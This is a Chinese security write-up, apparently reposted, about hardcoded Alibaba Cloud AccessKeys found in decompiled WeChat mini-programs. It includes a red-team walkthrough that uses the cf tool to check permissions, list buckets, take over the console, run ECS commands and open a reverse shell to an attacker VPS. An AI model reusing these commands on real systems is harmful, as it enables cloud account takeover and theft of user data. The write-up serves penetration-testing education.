微信小程序漏洞之accesskey泄露

admin 2024年2月9日01:33:58评论9 views字数 1182阅读3分56秒阅读模式
✎ 阅读须知

本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!

1. Accesskey泄露漏洞

这篇文章里面都是以我个人的视角来进行的,因为一些原因,中间删了好多东西,肯定有很多不正确的地方,希望大家能理解,也能指正其中的错误。

在以前文章里面,我们一起学习过mac下新版微信小程序反编译学习,通过反编译,来寻找一些漏洞,今天来学习下小程序里面的硬编码漏洞,其实硬编码漏洞,在这里指的是一些osskeyoss存储桶账号密码信息等写死在了小程序里面,通过反编译可以直接找到这些信息。

Accesskey就是密钥,可以直接理解为账号密码信息,一般由AccessKeySecretOSSAccessKeyId组成,可以通过诸多工具登录云服务器。

关键字:ossaccesskey

这种泄露,目前我反编译过很多小程序里面,也只遇到过几次而已(可能与我接到的需求不同有关),当小程序反编译之后,可以在里面全局搜索关键字,然后看下。

这种漏洞很简单,其实无论是小程序还是app,都是硬编码导致的漏洞。

本文仅对mac版较新的3.8.1版本的微信展开,不对其他环境负责。

本文的操作均是在有授权的情况下进行的。

2. AccessKey泄露案例-某电力行业

在某次攻防演练中,通过信息搜集到某电力行业存在商业小程序,于是通过反编译该小程序,进行快速打点,在这里直接搜到了泄露的Accesskey信息:

微信小程序漏洞之accesskey泄露

通过该信息直接在cf工具上进行配置,查看当前权限:

./cf alibaba perm

微信小程序漏洞之accesskey泄露

获取其中的存储桶信息:

./cf alibaba oss ls

微信小程序漏洞之accesskey泄露

直接看下多少个桶:

./cf alibaba oss ls -n 100

微信小程序漏洞之accesskey泄露

利用命令接管账号权限:(此命令执行之后,阿里云会给账户所有者发送短信和邮件进行提醒)

./cf alibaba console
微信小程序漏洞之accesskey泄露

列出当前的ecs资源:

./cf alibaba ecs ls

微信小程序漏洞之accesskey泄露

列出ecs之后,执行命令,尝试执行命令:

./cf alibaba ecs exec -b

微信小程序漏洞之accesskey泄露

反弹shell看下:

./cf alibaba ecs exec --lhost 攻击机vps --lport 4144 -i i-2
微信小程序漏洞之accesskey泄露

反弹到shell之后,通过命令寻找到了其中存在nacos服务,最终在数据库中找到10w+敏感用户数据。

3. 总结

在有授权的情况下,如果是hw的话,一般时间紧,任务重,主要是以发现有效的信息、RCE为主,而Accesskey这种一般在hw里面出现的可能性还是比较小的,但是在市面上一些其他的小程序里面找到还是相对比较容易的,比如以前看到的某成人用品店:

这个是在以前渗透的时候遇到的:

微信小程序漏洞之accesskey泄露

当时正在学习小程序(比较好奇哪些朋友用过),于是就对其进行了简单的分析,逆向之后就发现了不得了的东西:

微信小程序漏洞之accesskey泄露

当然,因为没有授权,在这里也就结束了。

原创稿件征集

原文始发于微信公众号(合天网安实验室):微信小程序漏洞之accesskey泄露

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月9日01:33:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   微信小程序漏洞之accesskey泄露https://cn-sec.com/archives/2211507.html

发表评论

匿名网友 填写信息